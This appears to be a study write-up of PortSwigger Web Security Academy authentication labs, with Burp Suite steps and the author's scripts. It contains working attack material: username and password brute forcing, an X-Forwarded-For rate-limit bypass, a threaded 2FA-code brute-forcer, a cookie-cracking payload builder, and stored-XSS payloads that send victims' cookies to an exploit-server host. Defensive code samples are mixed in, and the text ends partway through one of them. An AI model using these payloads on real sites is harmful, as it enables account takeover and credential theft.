[TOC]

# Basic Concept

## Logic Views

Stealing password reset tokens.

![image](https://hackmd.io/_uploads/BydO1XtlA.png)

## Authentication Factors

Common authentication factors:

**We know**
- password

**We have**
- mobile phone or security token

**We can do**
- biometrics or behaviour

## Authentication && Authorization

**Authentication**

Authentication is the process of verifying the user's identity.

**Authorization**

Once the user is authenticated, their privileges determine what they are authorized to do.

## Vulnerabilities Arise

### No brute-force protection

### Program logic flaws

The program lets an attacker leverage unexpected behaviour to bypass authentication.

## Impact

### Low-privilege accounts

A low-privilege account lets an attacker steal personal information, money, ...

### Admin account (goal)

Once we have an admin account, we can attempt to modify the website configuration or upload a web shell, i.e. find a way to run arbitrary code on the website.

# Password-based Vulnerabilities

## Weakness

It lets an attacker enumerate usernames and crack passwords by brute-force attack.

## Brute Force Attack

### Username Enumeration

This vulnerability typically occurs in the forgot-password page!
```
admin@somecompany.com
```

### Password Policy (high-entropy passwords)

If the website lets us register an account, we can use that functionality to learn the password policy.

### Observation

Things to watch when we perform a brute-force attack:

- status code
- error message
- response time

### LAB-1 Username Enumeration (Response Length)

Username dictionary: https://portswigger.net/web-security/authentication/auth-lab-usernames

Password dictionary: https://portswigger.net/web-security/authentication/auth-lab-passwords

Login page

```
POST /login HTTP/2
Host: 0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Cookie: session=RyZyjhbAo71qMSKopNdoJ2k9ntbDU7C1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Referer: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net/login

username=meowehecker&password=meowhecker
```

Response (error message)

![](https://hackmd.io/_uploads/H1lqK4SK3.png)

Invalid username -> error message

#### Enumerate username

Configuration

![](https://hackmd.io/_uploads/r1byfESF2.png)
![](https://hackmd.io/_uploads/SkmLfEBFh.png)
![](https://hackmd.io/_uploads/B1o2zNHF2.png)

Perform the attack

![](https://hackmd.io/_uploads/HJzLc4HYn.png)
![](https://hackmd.io/_uploads/HymdcNrK3.png)

Username: auto (valid)

#### Password cracking

![](https://hackmd.io/_uploads/HkYEsESK3.png)
![](https://hackmd.io/_uploads/By6SiVHKn.png)

---

sunshine -> status code 302 (temporary redirection)

![](https://hackmd.io/_uploads/rJEy2NHt3.png)

username: auto
password: sunshine

![](https://hackmd.io/_uploads/r1u8h4HFh.png)
![](https://hackmd.io/_uploads/BJlO3VSFn.png)

Solved

---

### LAB 2 Username enumeration via subtly different responses

Username dictionary: https://portswigger.net/web-security/authentication/auth-lab-usernames

Password dictionary:
https://portswigger.net/web-security/authentication/auth-lab-passwords

Analysis of the request/response

![](https://hackmd.io/_uploads/rJtc04Ht3.png)

**Username enumeration**

Payload setting

![](https://hackmd.io/_uploads/B1I-fSrFh.png)

**Find the password**

![](https://hackmd.io/_uploads/r1ZIfHHth.png)
![](https://hackmd.io/_uploads/BkZmlISYh.png)

password: killer

**Login**

account: archie
password: killer

![](https://hackmd.io/_uploads/BkzceIrKn.png)
![](https://hackmd.io/_uploads/SyBogISFh.png)

Solved

## Bypass IP-based Protection

The X-Forwarded-For header is used to tell the back-end service what the client IP is.

```
X-Forwarded-For
```

Sample code

```javascript
const express = require('express');
const app = express();

app.get('/', (req, res) => {
  // The header is taken at face value: a client can send
  // X-Forwarded-For: 10.10.10.1 and be treated as that address.
  const clientIp = req.headers['x-forwarded-for'] || req.connection.remoteAddress;
  res.send(`Client IP: ${clientIp}`);
});

app.listen(3000, () => {
  console.log('Server listening on port 3000');
});
```

```
npm install express
node "app.js"
```

```bash
curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000
```

![image](https://hackmd.io/_uploads/B1JxzBFgC.png)

### Lab-1: Brute-force (Response Time) && Bypass IP-based Protection

- Your credentials: `wiener:peter`
- [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
- [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

#### Site map

![image](https://hackmd.io/_uploads/rySajHFl0.png)

#### Dynamic parameters

```
/login
/post
```

![image](https://hackmd.io/_uploads/ryxy3rYxC.png)

#### Restriction

![image](https://hackmd.io/_uploads/ByjQjHtg0.png)

#### Bypass the limit restriction

Way 1: IP bypass

```
X-Forwarded-For: x
```

#### Enumerate username via response time

Attack type -> Pitchfork
Position 1 -> X-Forwarded-For value
Position 2 -> username to enumerate

![image](https://hackmd.io/_uploads/BksNvfqe0.png)

Potential password

![image](https://hackmd.io/_uploads/H1vddM5lA.png)

```
username=ao&password=MEOWHACKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKHACKEHACKERhhhhhhhhhhhhhhhhhhhhhhhhACKER
```

Username: ao

#### Exploit - Crack the password

![image](https://hackmd.io/_uploads/SJVMYGqlC.png)

```
Password:michael
```

**Login**

![image](https://hackmd.io/_uploads/rJ3l5z9g0.png)

Solved!!!

## Bypass Flawed Brute-force Protection

Common protection ways

### Locking the account

Bypass ways
- Password spraying

### IP block

Bypass ways
- X-Forwarded-For header
- If the website resets the login record once we log in successfully, we can register a valid account and add it into our wordlist

### LAB-1 Broken Brute-Force Protection (IP Block)

#### Site map

![image](https://hackmd.io/_uploads/S15Lt4qx0.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/SJ6BFN9lR.png)

#### Identify

```
POST /login
```

![image](https://hackmd.io/_uploads/BywGYNqg0.png)

Attempt limit = 3

![image](https://hackmd.io/_uploads/HJ_Gc45x0.png)

#### Bypass

Attempting with X-Forwarded-For

![image](https://hackmd.io/_uploads/By0ejNcgA.png)

Failed

---

Attempting to use the reset mechanism to bypass the limit

Valid account `wiener:peter`

Bypass wordlist

```python
#!/usr/bin/python3
# Exploit - reset mechanism
# Some systems reset the limit counter when the user logs in successfully
import argparse
import traceback


class Color:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def moewBanner():
    print(Color.HEADER + "##################################################")
    print("#                                                #")
    print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + "                       #")
    print("#                                                #")
    print("##################################################" + Color.ENDC)
    print(Color.WARNING + "-> Author: Meowhecker\n" + Color.ENDC)


def readWordlistToList(filePath):
    list = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                list.append(line.rstrip())  # Remove "\n"
            print("List:", list)
        return list
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)


def MakeBypassWordList(originalWordList, BypassWordlistPath, attemptLimit):
    with open(BypassWordlistPath, 'w') as bypassWordlist:
        # enumerate() traverses the whole list and assigns an index (Counter starts at 1)
        for Counter, line in enumerate(originalWordList, start=1):
            bypassWordlist.write(line + '\n')
            # Condition -> insert the valid password before the limit is reached
            if Counter % (attemptLimit - 1) == 0:
                # print("Insert", valid, "in bypassWordlist")
                bypassWordlist.write(valid + '\n')
    print("BypassWordlist Done !")
    return Counter  # Number of lines (for making the username list)


def MakeUsernameWordlist(TargetUserName, ValidUserName, bypassWordlistLinsNum, attemptLimit):
    with open(userWordlistPath, 'w') as userWordlist:
        Counter = 1
        for line in range(bypassWordlistLinsNum):
            userWordlist.write(TargetUserName + '\n')
            if Counter % (attemptLimit - 1) == 0:
                # print("Insert", ValidUserName, "in userWordlist")
                userWordlist.write(ValidUserName + '\n')
            Counter = Counter + 1
    print("UserWordlist - Done !")


# Main() !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Configure parameters
parsers = argparse.ArgumentParser(description='Meowhecker is a Cat')
parsers.add_argument("attemptLimit", type=int)
parsers.add_argument("valid", type=str)
parsers.add_argument("targetUserName", type=str)
parsers.add_argument("validUserName", type=str)
parsers.add_argument("-O", "--originalWordList", default="./defaultWordlist.txt")
parsers.add_argument("-B", "--bypassWordlist", default="./bypassWordlist.txt")
parsers.add_argument("-U", "--userWordlist", default="./userWordlist.txt")
args = parsers.parse_args()

originalWordList = args.originalWordList
BypassWordlistPath = args.bypassWordlist
attemptLimit = args.attemptLimit
valid = args.valid
targetUserName = args.targetUserName
validUserName = args.validUserName
userWordlistPath = args.userWordlist

moewBanner()
DefaultWordList = readWordlistToList(originalWordList)
bypassWordlistLinsNum = MakeBypassWordList(DefaultWordList, BypassWordlistPath, attemptLimit)
MakeUsernameWordlist(targetUserName, validUserName, bypassWordlistLinsNum, attemptLimit)
```

Run the following command

```
python3 addingValidBypassIpBlock.py 2 peter carlos wiener
```

![image](https://hackmd.io/_uploads/rkoxDpsgA.png)

Threads = 1 (Notice!!!)
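How a server closes both holes this section relies on, as an added example that is not the lab's or the author's code: it derives the client address without trusting X-Forwarded-For from arbitrary peers (the Express sample above trusts it blindly), and keeps a per-IP failure counter that a successful login does not wipe. The trusted-proxy address, the IPs, the limit and the "failed, failed, valid" pattern are constructed for the demo.

```python
import ipaddress
import time
from collections import defaultdict

# Constructed values for this example; a real deployment reads them from configuration.
TRUSTED_PROXIES = {"10.0.0.2"}   # only the reverse proxy is allowed to set X-Forwarded-For
ATTEMPT_LIMIT = 3                # the same limit the lab enforces
BLOCK_SECONDS = 60


def client_ip_naive(remote_addr, headers):
    """Weak: trusts X-Forwarded-For from anyone, like the Express sample above."""
    return headers.get("x-forwarded-for", remote_addr).split(",")[0].strip()


def client_ip(remote_addr, headers):
    """Use X-Forwarded-For only when the TCP peer is a trusted proxy, and then take the
    right-most address that is not itself a proxy: the client controls everything to the
    left of the entry the proxy appended. Header names are assumed lower-cased."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break                    # not an address: ignore the whole header
        if hop not in TRUSTED_PROXIES:
            return hop
    return remote_addr


class LoginThrottle:
    """Per-IP failed-login counter. reset_on_success=True reproduces the lab's flaw:
    one valid login every few attempts keeps the counter below the limit forever."""

    def __init__(self, reset_on_success, now=time.time):
        self.reset_on_success = reset_on_success
        self.failures = defaultdict(int)
        self.blocked_until = {}
        self.now = now

    def is_blocked(self, ip):
        return self.blocked_until.get(ip, 0) > self.now()

    def record(self, ip, success):
        """Returns True if the attempt was processed, False if the IP was already blocked."""
        if self.is_blocked(ip):
            return False
        if success:
            if self.reset_on_success:
                self.failures[ip] = 0   # the flaw: a success wipes the failure history
        else:
            self.failures[ip] += 1
            if self.failures[ip] >= ATTEMPT_LIMIT:
                self.blocked_until[ip] = self.now() + BLOCK_SECONDS
        return True


def simulate(throttle, outcomes, ip="203.0.113.7"):
    """Feed a sequence of login outcomes from one IP and return how many attempts the
    throttle processed before blocking (len(outcomes) means it never blocked)."""
    processed = 0
    for ok in outcomes:
        if not throttle.record(ip, ok):
            break
        processed += 1
    return processed


# The lab's pattern: two guesses, then a login with a known-valid account, repeated.
LAB_PATTERN = [False, False, True] * 4
```

The per-IP counter is only one layer; a per-account counter is still needed because the client address itself is cheap to change.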
![image](https://hackmd.io/_uploads/HyDHiioeR.png)
![image](https://hackmd.io/_uploads/BJaAqoilC.png)
![image](https://hackmd.io/_uploads/Sk-Eqsjl0.png)

#### Login

![image](https://hackmd.io/_uploads/HywO5osxC.png)

Successful

### LAB-2 Enumerate Username via Account Lock

#### Site map

![image](https://hackmd.io/_uploads/B1evWnjlC.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/SJPobnjgR.png)

#### Identify

Confirm defense mechanisms

![image](https://hackmd.io/_uploads/SJ4IWnolR.png)

Testing whether the website has account locking

![image](https://hackmd.io/_uploads/SkETm3sgR.png)
![image](https://hackmd.io/_uploads/H1NEE3jeR.png)

The website has account locking.

Username: albuquerque

Crack the password

![image](https://hackmd.io/_uploads/r1k042slA.png)

Attempt to log in to the website with

```
albuquerque:1qaz2wsx
```

Login

![image](https://hackmd.io/_uploads/H1nZShieA.png)

Solved

## Rate Limiting

Rate limiting typically works through an IP block to defend against a malicious IP.

Bypass ways
1. A time-controlled script.
2. Carry multiple credentials in a single HTTP request.
3. Race condition

### LAB-1 Bypass Rate Limiting via Multiple Credentials per Request

#### Site map

![image](https://hackmd.io/_uploads/H1Tk90oxA.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/S1yZ9RsgR.png)

#### Identify

**Confirm defense mechanisms**

IP block / rate limit

![image](https://hackmd.io/_uploads/By_7qAsg0.png)

-> JSON format (credentials)

**Bypass**

Carry multiple credentials in one HTTP request

Convert wordlist.txt to a JSON list

```python
import json

filePath = "./wordlist.txt"


class Color:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def moewBanner():
    print(Color.HEADER + "##################################################")
    print("#                                                #")
    print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + "                       #")
    print("#                                                #")
    print("##################################################" + Color.ENDC)
    print(Color.WARNING + "-> Author: Meowhecker\n" + Color.ENDC)


def readWordlistToList(filePath):
    list = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                list.append(line.rstrip())  # Remove "\n"
            # print("List:", list)
        return list
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)


def converListToJson(pythonList):
    # The password field of the login request is replaced with this JSON array
    if pythonList:
        jsonList = json.dumps(pythonList)
        return jsonList
    else:
        print("No python list")
        return None


# Main function
moewBanner()
wordlist = readWordlistToList(filePath)
jsonList = converListToJson(wordlist)
print("JSON list:", jsonList)
```

Result

![image](https://hackmd.io/_uploads/ByJhq0slA.png)

#### Exploit

![image](https://hackmd.io/_uploads/HJS1rCoeC.png)
![image](https://hackmd.io/_uploads/ByysF0olA.png)
![image](https://hackmd.io/_uploads/S1spYAoeC.png)

Solved

# Multi-Factor Authentication Vulnerabilities

## 2FA Two-Factor Authentication

Flawed design: email verification code + password (knowledge authentication) ->

## Two-factor authentication tokens

(Password - we know)
(Device verification code - we have)

Attacks
1. SIM card hijack
2. Message intercept

### LAB-1 Bypassing via Flawed Session Check

Valid credentials -> wiener:peter
Target account -> carlos:montoya

#### Site map

![image](https://hackmd.io/_uploads/SyfsuJRe0.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/Sy-6dJ0g0.png)

#### Identify

![image](https://hackmd.io/_uploads/Hy3VtyRxR.png)
![image](https://hackmd.io/_uploads/HJswFJCgC.png)

**Confirm defense mechanisms**

The website has 2FA authentication

Flawed design -> password (we know) -> email code (we know)

Bypass possible!

**Bypass**

Test 1: testing the parameter with carlos (IDOR)

![image](https://hackmd.io/_uploads/rJ_0YyClA.png)

Fail!!
The page is redirected to the login page

---

Test 2: testing the session parameter

![image](https://hackmd.io/_uploads/SyQYsJAl0.png)
![image](https://hackmd.io/_uploads/HkVNa1ClA.png)
![image](https://hackmd.io/_uploads/BkV_ak0lA.png)

Works

The account page didn't check whether the session has the login2 check flag, and the IDOR -> allows us to bypass the email code check!

#### Exploit

Log in to carlos's account

![image](https://hackmd.io/_uploads/Hk1Q2y0lC.png)
![image](https://hackmd.io/_uploads/rkaK3JCxC.png)
![image](https://hackmd.io/_uploads/B1kkpy0lR.png)

Solved!

## Flawed Two-Factor Verification Logic

![image](https://hackmd.io/_uploads/HkDlQeCxA.png)

### LAB-1 GET /login2 Can Trigger carlos's Email Verification Code (Flawed Logic)

Credentials: wiener:peter
Victim's username: carlos

#### Site map

![image](https://hackmd.io/_uploads/HycBreAxC.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/rJDIHl0eC.png)

#### Identify

Testing the authentication functionality.

**Confirm defense mechanisms**

The website has 2FA authentication

Flawed design -> password (we know) -> email code (we know) (GET /login2)

Same-factor auth!
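What a correct server-side state machine for the two login steps looks like, as an added example that is not the lab's or the author's code: it covers the session-check flaw from LAB-1 above (the account page must require a 2FA-completed flag, not just a password check) and the login2 flaw here (the account must come from the server-side session, never from a client-supplied `verify` cookie, and a 4-digit code must have a guess cap). The in-memory user and session stores, the plaintext demo passwords and the try limit are constructed; a real system emails the code instead of keeping it only in the session.

```python
import hmac
import secrets

# Constructed in-memory stores for this example (real code keeps password hashes, not passwords).
USERS = {"wiener": "peter", "carlos": "montoya"}
SESSIONS = {}           # session id -> {"user", "mfa_passed", "code", "tries"}
MAX_CODE_TRIES = 3      # a 4-digit code only holds up if guesses are capped


def login(username, password):
    """Step 1 (POST /login): password check. The session it creates is only
    half-authenticated; nothing protected is reachable yet."""
    if USERS.get(username) != password:
        return None
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {
        "user": username,
        "mfa_passed": False,
        "code": f"{secrets.randbelow(10000):04d}",   # in a real system this is emailed
        "tries": 0,
    }
    return sid


def login2(sid, submitted_code):
    """Step 2 (POST /login2): the account is the one bound to the server-side session,
    never a client-supplied 'verify' cookie, so a code can only be submitted for the
    account that passed step 1 in this very session."""
    s = SESSIONS.get(sid)
    if s is None or s["mfa_passed"]:
        return "denied"
    if s["tries"] >= MAX_CODE_TRIES:
        SESSIONS.pop(sid)          # too many wrong codes: force a fresh /login
        return "locked"
    s["tries"] += 1
    if not hmac.compare_digest(s["code"].encode(), str(submitted_code).encode()):
        return "wrong-code"
    s["mfa_passed"] = True
    return "ok"


def my_account(sid):
    """Protected page: both steps must be complete, not just the password check."""
    s = SESSIONS.get(sid)
    if s is None or not s["mfa_passed"]:
        return None
    return s["user"]


def wrong_code_for(sid):
    """Test helper: a 4-digit value that is not this session's code."""
    return "0000" if SESSIONS[sid]["code"] != "0000" else "0001"
```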
**Bypass**

![image](https://hackmd.io/_uploads/H1wH8gAlR.png)
![image](https://hackmd.io/_uploads/B1GcLx0eC.png)
![image](https://hackmd.io/_uploads/BJtXwgRlC.png)

Brute forcing -> guessing the valid code

![image](https://hackmd.io/_uploads/rkNIwgRgR.png)

We found it

![image](https://hackmd.io/_uploads/rJvsYlCxR.png)

Another way

```python
# Author: MeowHecker 侯智晟
# Bypass 2FA auth
import requests
import threading
import sys

url = "https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2"
Headers = {
    'Host': '0ae900ed033f23288166aceb000b003c.web-security-academy.net',
    'Cookie': 'verify=carlos; session=706d8zav60yMRSaANT9QUOdIQVYkXLhw',
    'Content-Length': '13',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'https://0ae900ed033f23288166aceb000b003c.web-security-academy.net',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document',
    'Referer': 'https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    'Priority': 'u=0, i',
}
RequestTimes = 0


def sendRequest(payload, sem):
    global RequestTimes
    payloads = {"Payload": payload}
    # Send the request and save the response
    response = requests.post(url, headers=Headers, data=payloads)
    print(f'Request Times{RequestTimes}: status code: {response.status_code} payloads: {payload}')
    RequestTimes = RequestTimes + 1
    # Target / success? (status code)
    if response.status_code != 200:
        # Found !!!!!!!
        print(f"Payload: {payload}, Response: {response.text}")
        sys.exit()
    sem.release()  # Release the semaphore slot
    sys.exit()  # Terminate this thread (SystemExit only ends the calling thread)


def threadingF():
    maxThreading = 20
    sem = threading.BoundedSemaphore(maxThreading)
    for i in range(10000):
        # Custom payload: 4-digit code with leading zeros
        payload = str(i).zfill(4)
        sem.acquire()
        sendRequestHandler = threading.Thread(target=sendRequest, args=(payload, sem))
        sendRequestHandler.start()
        print("Number of active threads:", threading.active_count())
    sys.exit()


threadingF()
sys.exit()
```

#### Exploit

![image](https://hackmd.io/_uploads/SJicYe0xA.png)

Solved

### LAB-2 2FA Bypass with a CSRF Token

Victim's credentials: `carlos:montoya`

#### Site map

#### Dynamic parameters

#### Identify

**Confirm defense mechanisms**

CSRF token! But the CSRF token can't defend against this

![image](https://hackmd.io/_uploads/ryHlefCxC.png)

Using a macro to automatically grab the token

**Bypass**

![image](https://hackmd.io/_uploads/Hkatw7RxC.png)

Using a macro to handle the CSRF problem

![image](https://hackmd.io/_uploads/B1JH-mAeC.png)
![image](https://hackmd.io/_uploads/HyNsIm0gC.png)
![image](https://hackmd.io/_uploads/BkB-fXReA.png)

#### Exploit

Notice: since the verification code is reset each time we test, we may need to repeat the attack several times

Threads = 1

# Other Authentication Mechanisms

## Cookie Login!
The "keep me logged in" functionality is typically implemented with a cookie. If the cookie value can be analysed, we can guess the victim's cookie and log in with the victim's identity.

Cookie - flawed design -> encode -> hash (without salt)

### LAB-1 Brute-forcing the Stay-Logged-in Cookie (the cookie can be cracked)

Valid credentials: wiener:peter
Victim's username: carlos
https://portswigger.net/web-security/authentication/auth-lab-passwords

#### Site map

![image](https://hackmd.io/_uploads/S1J6E4ReR.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/BJwnNNAlR.png)

#### Identify

![image](https://hackmd.io/_uploads/Bk4-P4AeR.png)

**Confirm defense mechanisms**

Basic password auth

The user cookie is not correctly encrypted!!

**Bypass**

Analyse the stay-logged-in cookie

![image](https://hackmd.io/_uploads/HyLFwVCxR.png)

Base64 decoded!!

```
wiener:51dc30ddc473d43a6011e9ebba6ca770
```

![image](https://hackmd.io/_uploads/BkuV_4RlR.png)

The password is hashed with MD5

#### Exploit

```python
import hashlib
import base64


class Banner:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'

    def __init__(self):
        self.meow_banner()

    def meow_banner(self):
        print(self.HEADER + "##################################################")
        print("#                                                #")
        print("# " + self.GREEN + "MeowHecker is a cat. ^O^" + self.HEADER + "                       #")
        print("#                                                #")
        print("##################################################" + self.ENDC)
        print(self.WARNING + "-> Author: Meowhecker\n" + self.ENDC)


def readWordlistToList(filePath):
    list = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                list.append(line.rstrip())  # Remove "\n"
            # print("List:", list)
        return list
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)


def readWordlistToHashList(wordlist):
    hashList = []
    for string in wordlist:
        # md5 input must be bytes (b"string", values 0~255)
        hashString = hashlib.md5(string.encode()).hexdigest()
        hashList.append(hashString)
    print(hashList)
    return hashList


def writeHashListToFile(hashList, hashFilePath):
    with open(hashFilePath, 'w') as hashFile:
        for hash in hashList:
            hashFile.write(hash + '\n')
    print(hashList)


def addingPrifixBase64Encode(hashList):
    # Rebuild the cookie format: base64("carlos:" + md5(password))
    finalPayloadList = []
    for hash in hashList:
        prifixAndPass = 'carlos:' + hash
        Encode = base64.b64encode(prifixAndPass.encode()).decode()
        finalPayloadList.append(Encode)
    return finalPayloadList


def writeFinalPayloadToFile(finalPayloadList, finalPayloadPath):
    with open(finalPayloadPath, 'w') as hashFile:
        for hash in finalPayloadList:
            hashFile.write(hash + '\n')


banner = Banner()
filePath = "./wordlist.txt"
hashFilePath = "./hashList.txt"
finalPayloadPath = "./finalPayload.txt"
wordlist = readWordlistToList(filePath)
hashList = readWordlistToHashList(wordlist)
writeHashListToFile(hashList, hashFilePath)
finalPayloadList = addingPrifixBase64Encode(hashList)
writeFinalPayloadToFile(finalPayloadList, finalPayloadPath)
```

This lab is broken.

### Lab-2 Offline Password Cracking

#### Site map

![image](https://hackmd.io/_uploads/Bk--q8kWR.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/HJOp9LkWC.png)

#### Identify

![image](https://hackmd.io/_uploads/ry3YsIkW0.png)

**Confirm defense mechanisms**

No HttpOnly flag

The cookie can be cracked (base64 + hash)

**Bypass**
Testing the comment functionality to find a place to execute JavaScript

We need to do two things
1. Grab the victim's cookie via JavaScript
2. Pass the victim's cookie to our server listener.

![image](https://hackmd.io/_uploads/ByFlaLkWC.png)

```html
<svg onload=prompt()>
```

![image](https://hackmd.io/_uploads/SyEVTL1Z0.png)

Successful

```html
<svg onload=alert(document.cookie)>
```

![image](https://hackmd.io/_uploads/ryxnA8kZR.png)

Stored XSS found!

#### Exploit

Exploit the XSS vulnerability to execute arbitrary JavaScript and pass the victim's cookie to the exploit server

Payloads that work

```
<svg onload= document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+document.cookie></svg>
```

Works

```
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
```

Works

Victim cookie

```
secret=O9VA9feGEVoEVmm1Lm0R37IwAUMzQhqO;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```

Base64 decode

```
secret=;Õ@õ÷†ZViµ.mß²0C3BŽ;%ÛK-k-–ˆ y-in=carlos:26323c16d5f4dabff3bb136f2460a943
```

Log in as the victim

Cookie ->

```
stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```

Doesn't work

Crack the cookie

![image](https://hackmd.io/_uploads/rkWzetJ-A.png)

Login

![image](https://hackmd.io/_uploads/H1pHA_kWA.png)

```
carlos
onceuponatime
```

![image](https://hackmd.io/_uploads/SJ-ngFkWR.png)
![image](https://hackmd.io/_uploads/HyUpxFyb0.png)

Solved!
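The two cookie labs above both come down to the stay-logged-in cookie being `base64(user:md5(password))`: whoever obtains it can crack the password offline, and it never expires. As an added example that is not the lab's or the author's code, here is that weak scheme beside a cookie that carries nothing derived from the password (an HMAC over user and expiry under a server-side key) and is rejected when tampered with or expired; the server key and the timestamp are constructed for the demo.

```python
import base64
import hashlib
import hmac
import time

# Constructed server secret for the example; real deployments load it from a secret store.
SERVER_KEY = b"example-key-not-for-production"
COOKIE_TTL = 30 * 24 * 3600


def weak_cookie(username, password):
    """The labs' scheme: base64(user:md5(password)). Unsalted MD5 of the password is
    handed to the browser, so a stolen cookie is an offline cracking target, and the
    cookie can never be expired or revoked without changing the password."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()


def decode_weak_cookie(cookie):
    """Shows how little protection base64 gives: user and hash fall straight out."""
    user, digest = base64.b64decode(cookie).decode().split(":", 1)
    return user, digest


def issue_cookie(username, now=None):
    """base64(user:expiry:HMAC-SHA256(key, user:expiry)). Nothing in it depends on
    the password, so it is useless for cracking, and it carries an expiry."""
    expiry = int(now if now is not None else time.time()) + COOKIE_TTL
    payload = f"{username}:{expiry}".encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload + b":" + tag.encode()).decode()


def verify_cookie(cookie, now=None):
    """Returns the username for a valid, unexpired cookie, otherwise None."""
    try:
        raw = base64.urlsafe_b64decode(cookie.encode()).decode()
        username, expiry, tag = raw.rsplit(":", 2)
        expiry = int(expiry)
    except (ValueError, UnicodeDecodeError):
        return None
    payload = f"{username}:{expiry}".encode()
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):      # constant-time comparison
        return None
    if (now if now is not None else time.time()) > expiry:
        return None
    return username
```

Pairing the cookie with a server-side record (so it can be revoked on logout or password change) and setting HttpOnly, Secure and SameSite are the remaining steps the labs' cookie also lacks.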
## Password Reset Mechanism

### Sending the password by email

Some websites send the password by mail. Users have multiple devices that automatically sync their mailbox, so we can intercept the mail if it passes over an insecure channel.

### Resetting the password via URL

```
http://vulnerable-website.com/reset-password?user=Valid-user
```

The reset page checks whether the token is valid

```
http://vulnerable-website.com/reset-password?token=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8
```

If the token matches -> redirect to the reset page

### LAB 1: Refresh the Form to Bypass the Token Check

Credentials: wiener:peter
Victim's username: carlos

#### Site map

![image](https://hackmd.io/_uploads/rkmKKFk-R.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/H1ZqYtJWR.png)

#### Identify

**Confirm defense mechanisms**

Resetting the password requires -> a token (received from the mail)

**Bypass**

![image](https://hackmd.io/_uploads/B1dTiYJbR.png)

#### Exploit

![image](https://hackmd.io/_uploads/BkeU4oF1-0.png)
![image](https://hackmd.io/_uploads/HybrjYk-R.png)

Solved!
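The token check described above only helps if it is applied on the submit as well as on the redirect, and if the account being reset is derived from the token rather than from a form field. As an added example that is not the lab's or the author's code, here is a reset-token lifecycle (random, single-use, expiring, bound to one account) beside the flawed submit handler LAB 1 exploits; the in-memory token store, the form field names and the timestamps are constructed for the demo.

```python
import secrets
import time

TOKEN_TTL = 15 * 60
RESET_TOKENS = {}       # constructed in-memory store: token -> {"user", "expires", "used"}


def issue_reset_token(username, now=None):
    """Creates an unguessable, single-use, expiring token bound to one account."""
    now = time.time() if now is None else now
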